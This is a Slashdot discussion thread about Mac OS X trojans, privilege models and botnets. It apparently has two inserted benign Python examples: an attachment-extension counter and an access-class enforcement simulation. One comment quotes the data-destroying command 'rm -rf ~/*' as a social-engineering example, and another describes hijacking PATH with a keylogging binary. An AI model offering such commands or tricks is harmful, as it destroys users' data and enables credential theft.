      Lot less anti-spyware, antivirus running on those machines to boot.

      Also, you didn't attack the argument, just the person. I thought the argument was rather good.

    48. Re:Yawn by Lars+T. · · Score: 1
      Are you telling me these servers weren't looked after by admins:

      http://it.slashdot.org/article.pl?sid=08/01/24/1930207 ?

      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    49. Re:Yawn by Lars+T. · · Score: 1
      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    50. Re:Yawn by Lars+T. · · Score: 1

      If I were a dirt-bag, scum-bucket hacker type, I'd probably really hate Macs and thus, try to attack those because of my out-of-proportion hatred towards Hipsters and Shiny Things.

      But then you would have no clue how to actually program Mac malware, and you would have to go for slightly modified code snippets from a Slashdot post to show those Macies.
      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    51. Re:Yawn by KGIII · · Score: 1

      Evidence? None. I applied rather simple logic instead. Mac users are just as human as Windows users and the percentage of stupid users is going to remain the same. There's no magic Mac pill that thwarts stupidity, thus ensuring social engineering remains effective. The exception to this, again no evidence, would be the various rare(r) PC OSes. The people who are using specific tools (RiscOS, *NIX, etc...) are _more likely_ to be better educated and aware of the risks. I am not a *NIX user as my main choice but I freely admit that *NIX users tend to be smarter about their actions on a computer.

      --
      "So long and thanks for all the fish."
    52. Re:Yawn by Anonymous Coward · · Score: 0

      Take your hands off of the keyboard. Stand up and step away from the computer.

      Most botnets are used by governments not to make money? Are you nuts? What are the most popular uses for botnets?

      Try to take down a site? yes
      To email as many people as possible? yes
      To make money off of said emails? yes
      To gather information and send it to ? yes.

      To spy on people for the government? *sounds of crickets* ... no

      Malware/virus writers learned that they could make a lot more money by botting machines than by breaking them. Which is why we see less of the computer-killing stuff nowadays. The number of viruses that go around deleting the FAT table on the disk drives has dropped. Deleting all of your files has dropped. Copying them is on the rise. Sending all of your bookmarks, form info, saved passwords somewhere is high on the list.

      Most sane governments are not doing this.

    53. Re:Yawn by KGIII · · Score: 1

      I'd respectfully argue that you're confusing today with the near future, in my humble opinion. It is my opinion, I haven't amassed nor analyzed the data, that the current affairs are still such that botnets are being used for spam, propagation of more malware, and DDoS attacks. The latter *may* be politically motivated but, at this time, I still haven't found overwhelming evidence to say that the majority of malware is politically motivated. I'll see your thoughts and raise you one.

      I have every reason to believe that what you're claiming is the future. I have every reason to believe that there have been some attacks that were backed by governments. I just don't see that as the norm yet. I suspect that the rate of government backing and politically based attacks is increasing and I believe that there will come a time in the future when there are full-scale attacks on major infrastructures on a regular basis with the various results (MAD anyone?), but not yet do I (again, no data, just observing) see this as the norm but rather as the exception. (I'd even go so far as to suspect that while some attacks aren't yet officially sanctioned, in all cases they are most likely tacitly approved by various governmental agencies across the globe.)

      Additionally, I suspect that there are plenty of bits of malware for most every OS out there - much as you say. I suspect that they're out there, that they are either in place or ready to deploy. I suspect that they remain hidden well enough to prevent detection and/or they are used so efficiently that they're simply not noted or made public by the victims.

      *shrugs* I think we're on the same page for the most part it is just that I'm seeing what you're saying as the future and you're saying that it is more prevalent today than I am aware of. Such may well be true and I can only base my opinions on the information that I have seen. I haven't crunched the numbers (and I'm not going to but would love it if someone has or will) but I'd not be surprised terribly if I were wrong. I keep tabs on the industry and the various reported security issues, responses, and events as I am wont to do.

      I spent a goodly amount of time nominally involved in the industry though that was years ago and my interests today are just that. I'm just interested because the subject is important to me for my own use and, in some instances, to better enable my hosting clients to make more informed choices or to assist them in achieving a more secure state. Without knowing more about you I would have to say that I'd not be at all surprised (or even really bothered) to find out that there is more political motivation than I was aware of. It may be that I am just more observant of the security events that most likely have a more immediate impact on me or my interests.

      Hmm... I think that's about it. Maybe... No, I guess. The last *major* problem that I assisted in was my (unfortunately post event) articulation of the dangers of spear phishing for some hosting clients and their company. It was really not something I needed to do but they brought it to our attention and asked for assistance. They had lost quite a bit of money, the criminal's plans were really well thought out, and there wasn't anything I could do about it except give them some education. This has little bearing on the specific threats of this threat, other than social engineering which is a rather mundane topic that involves death, horses, and a bat but it matters because, again, the bias is there so that's further evidence that I may just be paying attention to a limited scope and you have a wider view.

      --
      "So long and thanks for all the fish."
    54. Re:Yawn by drinkypoo · · Score: 1

      Anything! Well, it's not as bad as Vista. But the point is, if I've JUST answered a password prompt and I obviously haven't left the keyboard, I shouldn't be prompted again even if it's a legitimate point to prompt someone. I noodle around with all kinds of settings and change and tweak things endlessly, which is one of the reasons I love Linux so much. I'm not saying it's for everyone or that the Mac is for no one, but I got super-annoyed with that particular issue. Just because I often wander around in places that Apple thinks need extra security doesn't mean I should be prompted into oblivion.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    55. Re:Yawn by Tom · · Score: 1

      Mac users are just as human as Windows users and the percentage of stupid users is going to remain the same.

      You make two assumptions there that I'd like to challenge.

      One, that how humans act is independent of the environment and context. Almost everything in psychology strongly suggests the opposite. People in a different environment will act differently. Mac and windos users might be humans, but their experience with the machine is (slightly) different, and those differences can be leveraged. It's not a matter of intelligence, but expectations. If a UAC window gets on your nerves every few minutes, you stop reading them and taking them seriously. On the Mac, such "I need your password" popups are a lot less common, which means people aren't as used to them and are more likely to actually read them. One of many examples. And yes, OS X still does a whole lot of things wrong.

      Two, that users are stupid. I know this is common in IT. It took me a long time to get over it myself. But the fact is that users are not stupid; we make them stupid. Almost all user interfaces currently in use are badly, badly broken. If your car required you to press three different buttons in three different places with two hands and your nose in order to brake, and car manufacturers put the horrible number of accidents down to "users are stupid" - that's more like the truth.

      --
      Assorted stuff I do sometimes: Lemuria.org
    56. Re:Yawn by KGIII · · Score: 1

      I mostly write this for my own memory (please disregard, most anyone else). I will ponder and respond when I have thought about the above. (One small thing - stupid users exist. But not all users are stupid nor is their ignorance always their fault. It is, though, a stupid user that blindly clicks and enters information in my opinion, but I'll ponder so that I have actually thought before speaking.)

      --
      "So long and thanks for all the fish."
    57. Re:Yawn by Anonymous Coward · · Score: 0

      As a Mac user, I'm going to defend the above comment as not trolling. It's a logical argument. Likewise are all the arguments about human stupidity, which is not limited to any given platform, rather, to reference Voltaire, is a pretty good working analogy for infinity.

      Viruses thrive because of stupidity, not necessarily because of this or that platform's dominance (although there is more incentive to target a moderately secure, widespread OS over a reasonably secure, less common OS) or this or that security hole.

      Basically, it is possible to be trojan free without anti virus software on Windows or Mac OS, just that most people are stupid enough to be able to catch one even with anti virus software. Fortunately I won't be called a troll because stupid people don't hang out on /. ;-)

    58. Re:Yawn by KGIII · · Score: 1

      Sorry for not being clearer. Tendencies vs. "will do." There are some who will go after the simplest but if they reap few rewards they have less impact and less to gain. (Quotes are my own interpretation.)

      --
      "So long and thanks for all the fish."
    59. Re:Yawn by MickDownUnder · · Score: 1

      Books are always about the past; I've never bothered reading books about IT topics as they are always at least 2 years behind the bleeding edge.

      What happened to Estonia was nothing more than a small scale exercise, Russia's capabilities extend well beyond that.

      No doubt there is a sizeable percentage of hackers out there still in the world of yesterday, but the best black hats today do NOT NEED to waste their time with extortion or banking scams; they are on the government payrolls, and they can spend 100% of their time ensuring that they are one step ahead of the white hats and that they have covered all the bases, and that of course means hacking Mac OS X.

      Today malware is a national security threat; it's defence and an essential member of the arsenal of any 21st-century war machine.

    60. Re:Yawn by MickDownUnder · · Score: 1

      You have no idea what I'm talking about. Try reading the article I linked to.

    61. Re:Yawn by MickDownUnder · · Score: 1

      I was saying the largest botnets with the greatest penetration today are state run/backed and are largely silent, not being used for fraud, blackmail or anything so basic; they are being held in reserve for when they are needed in an attack on a 21st-century opponent.

      No it is not the norm in terms of the numbers of botnets out there, but in terms of the number of compromised machines, it probably is the norm.

    62. Re:Yawn by phantomfive · · Score: 1

      Uhuh.....so instead of being bothered to read books, you decide to draw your own random conclusions based on what you think? The best black hats are on government payrolls? In Russia? Because they make more money? Do you have any evidence of this? Do you really think Russian government employees make a lot of money? It is a great thought, but you better have some pretty good evidence to back up such an extravagant claim.

      --
      Qxe4
    63. Re:Yawn by Lurker · · Score: 1

      Unfortunately, there are already hundreds of Mac viruses. I have some super-spammed e-mail accounts that get hundreds of infected e-mails per day, and more often than not, viruses come with ".hpx" extensions and other MacOS file extensions. Ignoring these threats could have severe consequences for a Mac user, if they clicked on such a file.

      This is the second time you've made the claim that there are hundreds of Mac viruses, and I'm calling bullshit. There were a total of, I think, 42 viruses *ever* for Mac OS 9 and below, and so far maybe two for OS X and I'm pretty sure those were classified as trojans, not viruses. So, if you don't mind, please provide evidence of these hundreds of viruses for Mac OS.

    64. Re:Yawn by flnca · · Score: 1

      Well, this was just a rough estimate; I did not bother to count them. Providing you with proof would require scouring hundreds of thousands of (potentially archived) spam e-mails that I received. But even in the roughly 10,000 or so in my more recent spam-flooded accounts, doing that by hand is impossible. I would have to write a program to search through the mail folders for Mac file extensions. I can only tell you and others that are using Macs to be careful, because I've seen many, many MacOS file attachments. I'm not a MacOS user, so all I wanted was to post a reminder that not everything's peachy in Mac-land.
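      The program comment 64 says it would take to settle the question (comment 63's challenge to the "hundreds of Mac viruses" claim) is a small one. The following is an added example, not code from either poster: it tallies the declared filename extension of every MIME attachment across a set of messages and separates out the extensions associated with Mac software, so a folder of spam can be counted instead of eyeballed. The extension list is an assumption drawn from common Classic Mac OS and OS X distribution formats (the thread itself only names ".hpx"/".hqx"), and the sample messages are constructed, not real spam. `iter_mbox` feeds a real mbox folder through the same counter.

```python
"""Count attachment file extensions across a mail folder and pick out the
ones associated with Mac software.  Added example, not code from the thread."""
import email
import mailbox
import os
from collections import Counter
from email import policy
from email.message import EmailMessage

# Assumption: extensions typical of Classic Mac OS and OS X software
# distribution (BinHex, StuffIt, self-extracting archive, MacBinary,
# disk image, zipped application bundle).  Adjust to suit the folder.
MAC_EXTENSIONS = {".hqx", ".sit", ".sea", ".bin", ".dmg", ".app"}


def attachment_names(msg):
    """Yield the declared filename of every MIME part that carries one."""
    for part in msg.walk():
        name = part.get_filename()
        if name:
            yield name


def extension_counts(messages):
    """Tally attachment extensions over an iterable of raw RFC 822 strings
    (or already parsed messages).  Extensions are lower-cased so 'X.HQX'
    and 'x.hqx' land in the same bucket."""
    counts = Counter()
    for item in messages:
        if isinstance(item, str):
            msg = email.message_from_string(item, policy=policy.default)
        else:
            msg = item
        for name in attachment_names(msg):
            ext = os.path.splitext(name)[1].lower()
            counts[ext or "(none)"] += 1
    return counts


def mac_attachment_counts(messages):
    """Restrict the tally to the Mac-associated extensions."""
    return {ext: n for ext, n in extension_counts(messages).items()
            if ext in MAC_EXTENSIONS}


def iter_mbox(path):
    """Yield each message of a real mbox folder as a raw string, so the
    folder can be passed straight to extension_counts()."""
    for m in mailbox.mbox(path):
        yield m.as_string()


def build_sample_messages():
    """Constructed sample mail, not real spam: five messages, four of them
    with attachments.  Addresses use the reserved .invalid TLD."""
    def make(subject, filename=None):
        m = EmailMessage()
        m["From"] = "sender@example.invalid"
        m["To"] = "recipient@example.invalid"
        m["Subject"] = subject
        m.set_content("Please see the attached file.")
        if filename:
            m.add_attachment(b"\x00\x01constructed", maintype="application",
                             subtype="octet-stream", filename=filename)
        return m.as_string()
    return [
        make("Your photos", "photos.HQX"),
        make("Invoice", "invoice.pdf"),
        make("Free poker game", "poker.sit"),
        make("Free poker game (again)", "poker.sit"),
        make("No attachment at all"),
    ]


if __name__ == "__main__":
    sample = build_sample_messages()
    print("all attachments:", dict(extension_counts(sample)))
    print("mac-associated: ", mac_attachment_counts(sample))
```

      Counting only tells you what the filenames claim; a declared ".hqx" is still just a label on whatever bytes the sender chose, so the tally supports the "how many" argument in the thread, not a verdict on whether any given attachment is actually malicious.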

    65. Re:Yawn by JeffSpudrinski · · Score: 1

      Hey, Poltras,

      Speaking from the other side of the fence (as a system admin), I have to agree with your statement with a couple of exceptions.
      Security is perceived as a serious pain in the rear by users. I inherited the network I manage and it's MUCH more secure than it was when I got it. However, there's still a TON of things I would love to do that I'm either not allowed to or am not given the money to do. I was finally allowed to upgrade to a stateful inspection firewall, but wasn't allowed to close outgoing ports as I did the incoming ports. It was decided by higher-ups that they didn't want to cause problems for the users who were not causing problems (therefore leave outgoing stuff open for everyone).
      It's also very difficult to take away privileges once they've been given (e.g. "what do you mean I have to manually allow JavaScript now? Why won't it just work like it did before?")
      I am extremely strict on incoming traffic and only have a few ports open and then have the traffic directed to the pertinent (hardened) server.
      Not saying I won't ever get hacked, but I try to protect us here as well as I can and try not to be a tempting target (that's not an invitation to try...!).
      I am very cautious about dealing with other sysadmins directly because you never know what you'll get. Too many companies don't pay sysadmins enough and they move on to bigger and better after a while (I've been here 16 years now and have been the sysadmin for 7 years).
      You are also very correct about the software -vs- dedicated hardware firewall. "Ye Average Joe User" doesn't understand the difference.
      Users just want things to work without having to be bothered by annoying things such as security and when enough of them complain, management tends to listen to them rather than the person they pay to make the system secure.
      I don't consider myself "brilliant" by any stretch of the imagination, but I sincerely hope I wouldn't qualify as an "incompetent, overpaid screen-looker".
      Later,
      -JS

    66. Re:Yawn by Anonymous Coward · · Score: 0

      LOL yep, firewall port 80 of a web server and you're safe. They're SERVERS. 0 day vulnerable by design.

    67. Re:Yawn by MickDownUnder · · Score: 1

      Anyone with half a clue on the topic wouldn't base their opinions on books which are about 5 years out of date. It takes 2 years to research and write a book and then usually another year to get it into print; if you buy it a year or two after it was published... there's your 5 years. You might as well go read Harry Potter because at the end of the day it's more about entertainment than insight.

      Your best source of information on this topic is from your own IP logs and persons in the security business.

      In any case there is a ton of evidence freely available on the net that both the Russian and Chinese governments are actively involved in cyber warfare. There have been numerous incidents which have no other explanation. Like for example the attacks on Garry Kasparov's web site...

      http://www.theotherrussia.org/2007/05/30/other-russia-websites-under-attack/

      These were timed to coincide with an order to move the site of a political rally; when people assembled at the wrong location he was arrested for having co-ordinated an illegal assembly. That was a clear case of state police co-ordinating with DoS attacks. It has also been established through IP logs that there was overlap between these attacks and the attacks made on Estonia.

      With the Russian state controlling the media, the internet is absolutely essential for political opposition in Russia, same goes for China.

      In a time of war there is no doubt these networks will be used to inflict financial and logistical chaos on countries.

      So it is natural to presume European and US powers will or most probably already have a counter to this threat, which can really only be in kind.

      In the 21st century governments will be recruiting black hats to create botnets, both to shut down zombie machines actively participating in an active botnet and also to launch their own attacks. And of course these persons are going to be extremely highly skilled and very well rewarded (both Russia and China have $$$ now).

  9. 2 Trojans? by Anonymous Coward · · Score: 0

    Damn. I told you mac users were all filthy dirty sluts.

  10. Grrr... by mallardtheduck · · Score: 5, Insightful

    The ARDAgent vulnerability is pretty serious and stupid, but social engineering is not OS specific. The "poker game" could just as easily be implemented on Windows or Linux.

    There is nothing that any OS can do to prevent trojans. (At least not without seriously limiting the functionality of legitimate programs.)

    Slashdot's own summary of the ARDAgent vulnerability included a "proof-of-concept"; it is trivially easy to exploit and should be fixed ASAP.

    There is no news here.

    1. Re:Grrr... by TheLink · · Score: 1
      --
    2. Re:Grrr... by mallardtheduck · · Score: 2, Interesting

      However, once you have convinced the user to download and attempt to run the program, it is a short step to getting them to approve administrator access.

      By "seriously limiting the functionality of legitimate programs" I was referring to systems such as Bitfrost which, while providing strong protection against Trojans, also makes certain classes of application almost impossible to implement (i.e. a mass Flickr uploader or an FTP client).

    3. Re:Grrr... by martin-boundary · · Score: 1

      social engineering is not OS specific.

      To some extent, it actually is. Social engineering depends on the characteristics of the users being targeted, which includes their technical ability as well as how they choose to set up their environments.

      What makes an OS like Windows more vulnerable than a Linux OS (say) is both the larger and more diverse user population, which increases the likelihood of catching the right kind of (gullible) user, and also the strong standardization in Windows which guarantees the existence of tools and services to conduct the deed, whereas Linux tools are much more hit and miss due to the diversity of what is installed.

      A good example of the difference is those pop-up browser windows which show a fake system error message that I'm sure everybody has seen at some point. This is a social engineering attempt to fool Windows users, and the window decorations are purposefully chosen to fake a Windows system error message. Now this would never work well against Linux users, because there are so many different window managers in use that it's impossible to target a majority of users with a common fake error window.

      So the Windows OS is easier to target, even in a social engineering attack.

    4. Re:Grrr... by Tom · · Score: 1

      There is nothing that any OS can do to prevent trojans. (At least not without seriously limiting the functionality of legitimate programs.)

      Nonsense. Of course there are things you can do. None of them are easy, or entirely without inconvenience, but there are.

      You could, for example, get away from the "root == god" paradigm and add a user (or group) for more day-to-day admin tasks. Reserve the highest privilege level for modifications to the core system, i.e. the OS and core tools. To install an additional screensaver shouldn't require those top-level privileges. That way, you could alarm users very strongly when a tool requires top-level privileges, and tell them in no uncertain terms that this is highly unusual.

      You'd not eliminate all attacks, but you would make the usual total-control takeover a lot more difficult.

      There are other methods. I just outlined one to show that your claim as to "nothing" is overblown.

      --
      Assorted stuff I do sometimes: Lemuria.org
    5. Re:Grrr... by TheLink · · Score: 1

      My proposal has programs claiming what class of access they want (e.g. I need screen saver access), the user approving it and the O/S enforcing it (and optionally remembering the user's choice).

      Screensavers don't normally need network access or access to your personal documents or access to your webcam or microphone.

      So even if a "screensaver" is lying about being a screensaver, the damage it can do is limited to what a normal screensaver can do.

      Vista has sandboxing but it fails because it prompts so much that most people either turn off the controls or turn off their brains (get a habit of clicking through).

      Having users figure out whether a program is safe is similar to requiring them to solve the halting problem.

      It is easier to train users to recognize that something is wrong when a "screen saver" requires "Full System Privileges" (and the O/S starts showing scary warnings and disclaimers).

      --
    6. Re:Grrr... by mallardtheduck · · Score: 1

      But that won't stop a trojan from installing a spambot (since a normal user still needs permission to send emails) or stealing the user's data (since a normal user still needs access to their files and access to the internet).

      What's really needed is a change from the "any program can do anything that the user can do" paradigm. Unfortunately, this can't be done without restricting the functionality of legitimate programs.

    7. Re:Grrr... by stewbacca · · Score: 1

      Nothing looks more ridiculous than a WinXP fake system error pop-up in the middle of an OSX Safari session. It wouldn't be hard to determine the OS and display an OS-specific error screen, but hey, nobody ever accused the cretins of being intelligent.

    8. Re:Grrr... by ianare · · Score: 1

      I was watching a show about tropical rain forests, in which scientists were explaining the amazing diversity of plant species found there.
      They examined plots where there would be many different species in a small amount of space, and where members of the same species would be far from each other.
      In a hot and humid environment, disease causing organisms, whether fungus or bacterial, spread at a very high rate. Any plant species that grows too closely together gets wiped out, so there is a lot of pressure for diversity.

      Apply this to the current OS ecosystem - you have one 'species' covering almost all the land, and densely packed. If a disease breaks out, it spreads very quickly to many individuals.
      Having a greater diversity of OSes would be a real drag for spammers, bot-herders, ID thieves, etc.

      I say the sooner the better!

    9. Re:Grrr... by Tom · · Score: 1

      As I said, no single countermeasure will ever stop all possible attacks, so we agree on that.

      And yes, I agree that more limits on programs is a great thing to do. It just requires one little thing that most software developers are too lazy to do: The program needs to be able to tell the OS (e.g. at install time) everything that it expects to do under normal circumstances. If it wants to send mail, it must say so at install time, not suddenly "remember".

      --
      Assorted stuff I do sometimes: Lemuria.org
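
As an added illustration of the model the two posts above describe (a program declares its class of access, the user approves or refuses that declaration once, and the OS then enforces it), here is a small Python simulation. It is example code written for this page, not anything from the thread or from any real OS; the class names, the operations each class covers, and the "dangerous class" list are all constructed for the demo. The point it shows is the one TheLink made: a "screensaver" that lies about what it is still only gets what a screensaver gets.

```python
"""Toy model of declared-access-class enforcement (constructed example).

A program declares one access class at install time; the user is asked once
(with a loud warning for dangerous classes); afterwards every operation the
program attempts is checked against the declared class, and the user's
decision is remembered rather than re-prompted."""
from dataclasses import dataclass, field
from typing import Callable, Dict, FrozenSet, List, Tuple

# Assumed capability classes: the operations each kind of program legitimately needs.
CLASS_OPERATIONS: Dict[str, FrozenSet[str]] = {
    "screensaver": frozenset({"draw_screen", "read_idle_timer"}),
    "mail_client": frozenset({"network", "read_mailbox", "write_mailbox"}),
    "full_system": frozenset({"network", "read_documents", "write_documents",
                              "webcam", "microphone", "draw_screen",
                              "read_idle_timer", "read_mailbox",
                              "write_mailbox", "modify_system"}),
}

# Classes whose approval prompt should carry the "this is highly unusual" warning.
DANGEROUS_CLASSES = frozenset({"full_system"})


@dataclass
class Decision:
    approved: bool
    warned: bool


@dataclass
class Enforcer:
    """Asks the user once per program, remembers the answer, enforces it later."""
    # (program, declared class, dangerous?) -> did the user approve?
    ask_user: Callable[[str, str, bool], bool]
    decisions: Dict[str, Decision] = field(default_factory=dict)
    declared: Dict[str, str] = field(default_factory=dict)
    denied_log: List[Tuple[str, str, str]] = field(default_factory=list)

    def install(self, program: str, declared_class: str) -> Decision:
        """Install-time step: the program states its class, the user decides."""
        if declared_class not in CLASS_OPERATIONS:
            raise ValueError(f"unknown access class {declared_class!r}")
        dangerous = declared_class in DANGEROUS_CLASSES
        approved = self.ask_user(program, declared_class, dangerous)
        decision = Decision(approved=approved, warned=dangerous)
        self.decisions[program] = decision
        self.declared[program] = declared_class
        return decision

    def request(self, program: str, operation: str) -> bool:
        """Runtime step: allowed only if approved and inside the declared class."""
        decision = self.decisions.get(program)
        if decision is None or not decision.approved:
            self.denied_log.append((program, operation, "not approved"))
            return False
        if operation not in CLASS_OPERATIONS[self.declared[program]]:
            self.denied_log.append((program, operation, "outside declared class"))
            return False
        return True


def demo() -> dict:
    """Constructed scenario: a simulated user approves anything not flagged dangerous."""
    enforcer = Enforcer(ask_user=lambda prog, cls, dangerous: not dangerous)
    enforcer.install("pretty-fish.saver", "screensaver")   # approved silently
    enforcer.install("poker.app", "full_system")           # warned, refused
    return {
        "saver_draw": enforcer.request("pretty-fish.saver", "draw_screen"),
        "saver_net": enforcer.request("pretty-fish.saver", "network"),   # lying saver, blocked
        "poker_docs": enforcer.request("poker.app", "read_documents"),   # never approved
        "denials": len(enforcer.denied_log),
    }


if __name__ == "__main__":
    print(demo())
```

The `denied_log` is the part a defender cares about: a "screensaver" asking for `network` or `read_documents` is exactly the kind of event worth surfacing to the user or a log collector, since the declared class gives you something concrete to compare the program's behaviour against.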
    10. Re:Grrr... by LMariachi · · Score: 1

      Semantics. OP was saying you can't block a meaningful percentage of trojan vectors, not that there are no possible strategies to prevent them. Even in *nix, there's always the possibility of convincing a user to open an xterm and type "rm -rf ~/*", which, from the user's point of view, would be a lot more damaging than some suid malware chewing up cycles and bandwidth. You don't need root access in order to be a problem.

    11. Re:Grrr... by Tom · · Score: 1

      Semantics. OP was saying you can't block a meaningful percentage of trojan vectors, not that there are no possible strategies to prevent them

      Oh, please. Don't start with linguistics if you fail basic reading skills. OP was saying, quote:

      There is nothing that any OS can do to prevent trojans.

      There's an all-quantor there, if you insist on semantics. Maybe he meant what you point out, but he didn't say it.

      --
      Assorted stuff I do sometimes: Lemuria.org
    12. Re:Grrr... by LMariachi · · Score: 1

      Read in absolute terms, the statement is utterly absurd, which is why I figured the author didn't literally mean "nothing" and "prevent." When a man says "Nothing is certain except death and taxes," or "Nobody expects the Spanish Inquisition," one doesn't take him to mean that gravity is iffy or that Torquemada spontaneously came into existence full-grown. Believe me, I'm all in favor of accuracy in language, but it isn't math.

    13. Re:Grrr... by Tom · · Score: 1

      Actually, I think math is a language, but that's beside the point because the reverse isn't true.

      Yes, he probably didn't mean what he wrote. Which leaves the question why he wrote it in absolute terms when he didn't mean it. I still think it's better to challenge the words someone (objectively) uttered than the meaning I (subjectively) assume. The assumption might be wrong and then the discussion gets either awkward or confused. In the first case, he can always correct and point out what it really was that he meant.

      --
      Assorted stuff I do sometimes: Lemuria.org
  11. Society is not an OS X vulnerability by Anonymous Coward · · Score: 5, Insightful

    For crying out loud people, the poker game one is applicable to any system you want to code it on! What does this have to do with being a Mac OS X security hole? It would work on Linux, BSD, RandomOSMadeUpOnTheSpurOfTheMoment (Infinium labs).

    1. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      It's more about who you are on the system when you run it.

      I don't know OS X at all but if most people log in with administrator or root permissions like they do in Windows, then it's a problem because the Trojan can do its dirty work all over your system - otherwise it can just damage the same stuff that the user has write permissions to.

      --
      Gentoo Linux - another day, another USE flag.
    2. Re:Society is not an OS X vulnerability by vux984 · · Score: 1

      I don't know OS X at all but if most people log in with administrator or root permissions like they do in Windows,

      1) Windows XP and previous default to administrator accounts. Windows Vista is more like Ubuntu, except it prompts you more often (mostly because tons of old XP and earlier software tries to do things it really shouldn't need to do). There is a good REASON MS is trying to kill off XP.

      2) OS X is like Vista and Ubuntu.

      then it's a problem because the Trojan can do it's dirty work all over your system - otherwise it can just damage the same stuff that the user has write permissions to.

      'just' the stuff the user has write permissions? So, like, all his personal files, financial data, work data, email, pictures, compositions, contact list, his application preferences, and his personal start up tasks.

      Whew, good thing it's restricted to 'just' that.

    3. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto.

      Please go read an appropriate book - this really is "standard" sysadmin stuff.

      --
      Gentoo Linux - another day, another USE flag.
    4. Re:Society is not an OS X vulnerability by Anonymous Coward · · Score: 0

      I think it's easier on the *nixes to run as a normal user than it is on Windows; your day-to-day use of the computer is less likely to need admin privileges.

      The default first user is an admin account on OS X, i.e. it has sudo privileges. I changed my personal account to non-admin i.e. no super user.

      Nevertheless, the parent makes a good and often forgotten point. A virus *doesn't* have to have root to be a considerable pain in the neck. Mod parent up.

    5. Re:Society is not an OS X vulnerability by squiggleslash · · Score: 4, Insightful

      Do you really think the average computer user is a "standard" sysadmin who knows "standard sysadmin stuff"?

      Most people who buy computers want and expect it to "just work" rather than to spend time learning how to maintain the system. The ideal system, for them, is maintenance free. Funnily enough, one computer manufacturer in particular specializes in the whole "just works" concept. Their customers definitely do not expect to have to set up cronjobs to copy files across the network to a secure RAID server in the closet.

      Can you guess which manufacturer that is?

      --
      You are not alone. This is not normal. None of this is normal.
    6. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      In which case, take it from someone who is experienced and maybe learn something.

      Unfortunately, you're leading this argument in a big circle because if you are an inexperienced user who then just happens to do everything with administrator privileges without realising the consequences (whether that's in Windows, OS X, Linux, whatever) then I am telling you now, as a matter of plain fact as someone who works in OS security, that you are at more risk of bad effects from a Trojan than if you do most stuff with normal privileges.

      Take it or leave it, it's up to you.

      --
      Gentoo Linux - another day, another USE flag.
    7. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 2, Informative
      A virus *doesn't* have to have root to be a considerable pain in the neck. Mod parent up.

      I agree entirely - but what's easier to recover? Just damaged user files or the whole system plus the damaged user files?

      --
      Gentoo Linux - another day, another USE flag.
    8. Re:Society is not an OS X vulnerability by mwlewis · · Score: 3, Insightful

      Depends upon what sort of information they stole from your user files. How do you 'recover' stolen proprietary information? The 'whole system' may be trivial in comparison.

      --
      JOIN US FOR PONG!
    9. Re:Society is not an OS X vulnerability by vux984 · · Score: 1

      On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto.

      1) The average PC doesn't have a good administrator.

      2) The real damage malware will do to a user has nothing to do with damaging files, it's related to identity theft and data theft. Backups don't get you very far here.

      3) If you are doing proper backups, then a full system restore really isn't that much more work than a single profile restore. It's slightly more time consuming, but the average user doesn't really care.

      Please go read an appropriate book - this really is "standard" sysadmin stuff.

      So is the fact that most malware can do most of what it wants to do even if it's confined to the user profile, so trumpeting about Linux/OSX's superior security model is almost irrelevant.

      Yet here we are...

    10. Re:Society is not an OS X vulnerability by isorox · · Score: 1

      On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto.

      Irrelevant. I can reinstall my OS and all applications in under an hour, and as long as I have a recent backup of /home it's easy to recover. This isn't the 90s, people don't care about their computer, they care about their data.

      More worrying is something that replaces the /usr/bin/firefox with a keylogging version. You'd need root access for that, which is why local exploits are important. Of course the average slashdotter wouldn't run untrusted binaries or code. This is where the local exploit in conjunction with a vulnerability in apache (which gives hardly any access to an exploiting program) is dangerous, and the biggest threat to the average aware Linux user. The other main threat is a breach of your distro's repositories.

    11. Re:Society is not an OS X vulnerability by Anonymous Coward · · Score: 0

      But it's twice as easy to program on ruby on rails, as long as you copy their sample app

    12. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      So is the fact that most malware can do most of what it wants to do even if it's confined to the user profile, so trumpeting about Linux/OSX's superior security model is almost irrelevant.

      Rather than acting on emotion, I suggest you need to reread my original post because not at one point did I trumpet about security models.

      What I did say in response to another posting was that because of marketing by Apple and Microsoft, OS X and Windows are sold as "easy for newbies" to use &, likewise, people like you trumpet constantly about how difficult Linux is to use. Therefore, it is logical to suggest that more newbie users use OS X and Windows than they do Linux and therefore are part of the problem when it comes to insecurities in ANY OS.

      I also use XP and because I know about security, I do not get any problems with it and cannot recall the last time I got a virus on it. I do find the Windows security model overly complex compared to UNIX/Linux but that's just opinion and I'm sure there are plenty of better qualified Windows sysadmins than me who could argue the opposite.

      If you are going to respond to my comments then please read them properly first and then stay on topic. Thanks.

      --
      Gentoo Linux - another day, another USE flag.
    13. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      Please stop playing the pedant.

      It has nothing to do with "what" was stolen and you know it. It's just a diversionary tactic you are employing because you have taken everything I have said as being a criticism of your wonderful OS X. In reality, had you pushed the raw emotion aside, you would have read my comments for what they are - namely, the fact that inexperienced users are part of the problem by doing stuff using too high permissions and that is the case whatever OS they care to use.

      --
      Gentoo Linux - another day, another USE flag.
    14. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      Irrelevant. I can reinstall my OS and all applications in under an hour, and as long as I have a recent backup of /home it's easy to recover. This isn't the 90s, people don't care about their computer, they care about their data.

      Your statement is a paradox. How can you care about your data and NOT care about the computer you store it on??? Do you mean to tell me that applying security updates, running security scanners and malware checkers are not relevant??? Remind me never to give you any of MY data to keep safe then...

      More worrying is something that replaces the /usr/bin/firefox with a keylogging version. You'd need root access for that, which is why local exploits are important.

      Huh??? Why do you need to REPLACE /usr/bin/firefox??? Why not just put another (keylogging) Firefox binary into the user's $PATH so that version is run first? Why would you need root access to do this?

